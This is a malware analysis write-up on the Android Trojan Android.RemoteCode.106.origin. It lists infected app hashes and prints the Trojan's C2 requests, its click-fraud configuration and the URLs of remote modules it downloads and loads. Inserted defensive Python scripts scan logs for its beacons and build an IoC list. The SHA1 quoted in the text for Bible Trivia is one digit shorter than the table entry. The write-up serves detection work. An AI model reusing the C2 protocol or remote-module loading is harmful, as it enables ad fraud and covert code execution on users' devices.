SHA1 | Application package name | Application version with the Trojan
---|---|---
0e5e5cfbeb05fe27f59c8aa15bfca3556cbe7005 | com.alkalinelabs.bandgame | 1.47
29bbbcdbc888a7ff7e7bfaa96b3815a604b903fc | com.gamehero.sweetbakerymatch3saga | 3.0
287aea9ca36ace404372f98e222ab2d509e49019 | com.gamehero.cartoonracoon | 1.0.2
1cd9537c376d139f91b3628e01c7d0e2079ba2e5 | com.antee.biblicalquiz | 1.8
3f50c348c94a53164d0bd241773c9b90aee3a85f | en.biblequiz.pro | 2.4
c916a6fa36b76bd0af8b0a181d3f349fd086c19d | com.justfclean.fustc | 1.0
d88f7805a619f108b55921269e94c31fbdf1d4f5 | com.getrewarded | 1.9
8f9587da8dac4befc9617817ded31297a70e9328 | com.alkalinelabs.learntosing | 1.2
78dec5a8ff19c27211542ee7a251c3fb6f44df4a | com.mdroidapps.easybackup | v.4.9.15
An Android Trojan that can be embedded into benign applications. Several programs containing Android.RemoteCode.106.origin were detected on Google Play.
The Trojan starts automatically in the following cases:
- Boot of an infected mobile device (it tracks the system event android.intent.action.BOOT_COMPLETED);
- Receipt of the intent MOBGUN_REPORT_INTENT, which is sent every 30 seconds by means of the AlarmManager class; on devices running Android 5.0 and later, the launch is scheduled every 30 seconds with JobScheduler instead;
- Launch of the application that contains Android.RemoteCode.106.origin.
Android.RemoteCode.106.origin stays inactive if the infected device lacks a certain number of photos, contacts and call-log entries. For example, the trojanized version of the application Bible Trivia v1.8 (sha1: 1cd9537c376d139f91b3628e01c7d0e2079ba2e) requires that the device has:
- At least 10 photos;
- At least 3 call-log entries over the last three days;
- At least 10 contacts with a phone number.
If these conditions are satisfied, Android.RemoteCode.106.origin sends the following request to the command and control server:
GET http://mobgun*********.com:443/sys/k/get/?pn=com.antee.biblicalquiz&sub=test_sub_id&pub=90154&aid=99d078094e1be3b9&av=16&v=11&b=Z2VuZXJpYw==&m=c2Rr HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
Host: mobgun*********.com:443
Connection: Keep-Alive
Accept-Encoding: gzip
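The check-in request above has a recognisable shape: a GET to /sys/k/get/ carrying the package name, publisher and sub-publisher ids, the Android id, the API level, and the device brand and model as base64 (Z2VuZXJpYw== decodes to "generic", c2Rr to "sdk"). The following Python is an added example, not code from the original write-up: it scans proxy-style log lines for that pattern and decodes the base64 fields so an analyst can see which package and device produced the beacon. The log line format, the sample entries and the host name mobgun-placeholder.invalid (standing in for the masked C2 domain) are constructed for this example.

```python
"""Flag Android.RemoteCode.106.origin check-in requests in proxy logs (added example)."""
import base64
import binascii
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines in the form "<client> <method> <url> <user-agent>".
# The first line mirrors the request shown in the write-up; the host is a placeholder.
SAMPLE_LOG = """\
10.0.0.12 GET http://mobgun-placeholder.invalid:443/sys/k/get/?pn=com.antee.biblicalquiz&sub=test_sub_id&pub=90154&aid=99d078094e1be3b9&av=16&v=11&b=Z2VuZXJpYw==&m=c2Rr Dalvik/1.6.0 (Linux; U; Android 4.1.2; sdk Build/MASTER)
10.0.0.13 GET http://www.example.com/sys/k/get/?pn=foo Mozilla/5.0
10.0.0.14 GET http://cdn.example.com/app/update.json?v=11 okhttp/3.9
"""

BEACON_PATH = "/sys/k/get/"
# Parameters present in the observed check-in; all of them must be there to count as a hit.
REQUIRED_PARAMS = {"pn", "sub", "pub", "aid", "av", "v", "b", "m"}


def _b64_text(value):
    """Decode a base64 query value to text; None if it is not valid base64/UTF-8."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def classify_request(url):
    """Return a dict describing the beacon if `url` matches the check-in shape, else None."""
    parts = urlsplit(url)
    if parts.path != BEACON_PATH:
        return None
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if not REQUIRED_PARAMS.issubset(params):
        return None
    brand = _b64_text(params["b"])
    model = _b64_text(params["m"])
    if brand is None or model is None:
        return None
    return {
        "host": parts.hostname,
        "package": params["pn"],
        "publisher": params["pub"],
        "android_id": params["aid"],
        "api_level": params["av"],
        "brand": brand,
        "model": model,
    }


def scan_log(text):
    """Return a list of (client_ip, beacon_info) for every log line whose URL matches."""
    hits = []
    for line in text.splitlines():
        fields = line.split(" ", 3)
        if len(fields) < 3:
            continue
        client, url = fields[0], fields[2]
        info = classify_request(url)
        if info:
            hits.append((client, info))
    return hits


if __name__ == "__main__":
    for client, info in scan_log(SAMPLE_LOG):
        print(client, info)
```

Only the first sample line is reported; the second shares the path but lacks the full parameter set, so it is not mistaken for a beacon. In a real deployment the path and parameter names would be one signal among several, since the operator can change them between builds.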
As a response, it gets a command with a list of web addresses to follow:
{
  "result":true,
  "k":[
    {
      "t":1,
      "u":"http://download********.top/click.php?cnv_id=[CLICK_ID]&payout=0.01"
    },
    {
      "t":2,
      "u":"http://download********.top/click.php?cnv_id=[CLICK_ID]&cnv_status=[TIME]&payout=0.01"
    },
    {
      "t":0,
      "u":"http://download********.top/click.php?key=du7ww2dgf7uje503rvmd&pubid={pubid}"
    }
  ]
}
After that, the Trojan attempts to follow the received links. If it manages to open them and receives a response, Android.RemoteCode.106.origin proceeds to its main malicious functions.
The Trojan then sends the following request to the server http://mobgun*********.com/sys/m/g/:
{
"v":11,
"ref":"02e1f7vtlfnbzac1",
"model":"sdk",
"pubId":"90154",
"subId":"test_sub_id",
"brand":"generic",
"pn":"com.antee.biblicalquiz",
"m":[
],
"aid":"99d078094e1be3b9",
"av":16
}
As a response, it receives a command with a list of additional modules (x.awvw.Awvw – Android.Click.199.origin, x.wpp.Wpp – Android.Click.200.origin) and a configuration file that must be downloaded from the server:
{
"result":true,
"m":[
{
"t":1,
"n":"x.awvw.Awvw",
"h":"b42c215188486c7ed65341d2fdefda3b",
"u":"/sys/m/l/5b3f1818-f0f5-49c4-b77f-7f455027bd14/"
},
{
"t":1,
"n":"x.wpp.Wpp",
"h":"ce77c3c4b33b0d078afdec6fbfc21093",
"u":"/sys/m/l/9d2dc3fd-abf1-4c61-80e6-2b5a8b3f77f7/"
},
{
"t":3,
"n":"config",
"h":"25507ab4013f1deafebf14487cebcb61",
"u":"/sys/m/l/e2a018b0-c3d5-40a6-ae44-4ef7bec205c3/"
}
],
"time":1510217665299
}
The configuration file of the Trojan looks as follows:
{
  "debug":true,
  "debugList":[
    "76e5379d356d8156",
    "644e08515fb7ab5",
    "c6f19b3e796ea3fb",
    "76e5379d356d8156",
    "e946a5959a48945b"
  ],
  "awvw":true,
  "awvwUrl":"http://*.*.65.235:18011/sys/action/?t={TYPE}&pn={PACKAGENAME}&aid={ANDROIDID}&av={APIVERSION}&brand={BRAND}&model={MODEL}&msg={MSG}&tid={TID}&sv={SOFTVERSION}",
  "awvwTaskUrl":"http://*.*.65.235:18080/sys/task/get/",
  "awvwPingUrl":"http://*.*.65.235:18011/sys/ping/",
  "awvwMaxWorkers":3,
  "awvwMaxAttempts":5,
  "awvwAttemptDelay":30000,
  "awvwDebug":false,
  "awvwVisible":false,
  "awvwVisible":false,
  "awvwTouchable":false,
  "glPingDelay":900000,
  "awvwRefreshDelay":60000,
  "awvwMaxNoRefresh":600000,
  "awvwCookieDelay":30000,
  "awvwPageFinishTime":15000,
  "awvwClickTimeout":15000
}
The link to each module is built by concatenating the host name http://mobgun*********.com with the string u from the server response:
- http://mobgun*********.com/sys/m/l/9d2dc3fd-abf1-4c61-80e6-2b5a8b3f77f7/ – for Android.Click.200.origin.
- http://mobgun*********.com/sys/m/l/5b3f1818-f0f5-49c4-b77f-7f455027bd14/ – for Android.Click.199.origin.
The downloaded malicious components are JAR files that, once downloaded, are loaded with the DexClassLoader class.
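The module-list response and the URL construction rule above together give an analyst everything needed to inventory the second-stage artifacts. The Python below is an added example, not code from the original write-up: it parses the response shown earlier, rebuilds the full download URL for each entry the way the text describes (C2 host name + the "u" string), maps the module names to the detection names given above, and checks a fetched file against the "h" value. That value is a 32-hex-digit string and is treated here as MD5, which is an assumption; the write-up does not name the algorithm. The host name mobgun-placeholder.invalid stands in for the masked C2 domain, and the module bytes are constructed, not a real sample.

```python
"""Build an IoC inventory from the Android.RemoteCode.106.origin module list (added example)."""
import hashlib
import json

# Placeholder for the masked C2 host mobgun*********.com
C2_HOST = "http://mobgun-placeholder.invalid"

# Module names from the response mapped to the detection names given in the write-up
KNOWN_MODULES = {
    "x.awvw.Awvw": "Android.Click.199.origin",
    "x.wpp.Wpp": "Android.Click.200.origin",
}

# The module-list response as shown in the write-up (whitespace only reflowed)
RESPONSE_JSON = """
{"result":true,
 "m":[
  {"t":1,"n":"x.awvw.Awvw","h":"b42c215188486c7ed65341d2fdefda3b","u":"/sys/m/l/5b3f1818-f0f5-49c4-b77f-7f455027bd14/"},
  {"t":1,"n":"x.wpp.Wpp","h":"ce77c3c4b33b0d078afdec6fbfc21093","u":"/sys/m/l/9d2dc3fd-abf1-4c61-80e6-2b5a8b3f77f7/"},
  {"t":3,"n":"config","h":"25507ab4013f1deafebf14487cebcb61","u":"/sys/m/l/e2a018b0-c3d5-40a6-ae44-4ef7bec205c3/"}
 ],
 "time":1510217665299}
"""

# Constructed stand-in for a downloaded module; not a real sample
FAKE_MODULE = b"constructed stand-in for a downloaded module, not a real sample"


def parse_module_list(raw, c2_host=C2_HOST):
    """Return one dict per entry with the full download URL and a detection name."""
    data = json.loads(raw)
    if not data.get("result"):
        return []
    inventory = []
    for entry in data.get("m", []):
        # In this response t=1 entries are code modules and t=3 is the config file
        kind = "config" if entry["t"] == 3 else "unknown"
        inventory.append({
            "type": entry["t"],
            "name": entry["n"],
            "detection": KNOWN_MODULES.get(entry["n"], kind),
            "hash": entry["h"].lower(),
            "url": c2_host.rstrip("/") + entry["u"],
        })
    return inventory


def md5_hex(blob):
    """Hex digest of the artifact; MD5 is assumed from the 32-hex-digit "h" field."""
    return hashlib.md5(blob).hexdigest()


def hash_matches(blob, expected_hex):
    """True if a downloaded artifact matches the server-supplied hash."""
    return md5_hex(blob) == expected_hex.lower()


def ioc_lines(inventory):
    """Flat text lines (hash, URL, name) suitable for a blocklist or hunt query."""
    return [
        f"md5:{item['hash']}\t{item['url']}\t{item['name']} ({item['detection']})"
        for item in inventory
    ]


if __name__ == "__main__":
    inv = parse_module_list(RESPONSE_JSON)
    print("\n".join(ioc_lines(inv)))
    print("stand-in matches first module hash:", hash_matches(FAKE_MODULE, inv[0]["hash"]))
```

Because the server hands out the hash alongside the URL, a sandbox that captures the downloaded JAR can confirm it got the intended artifact before static analysis; a mismatch usually means the operator swapped the payload or served a decoy.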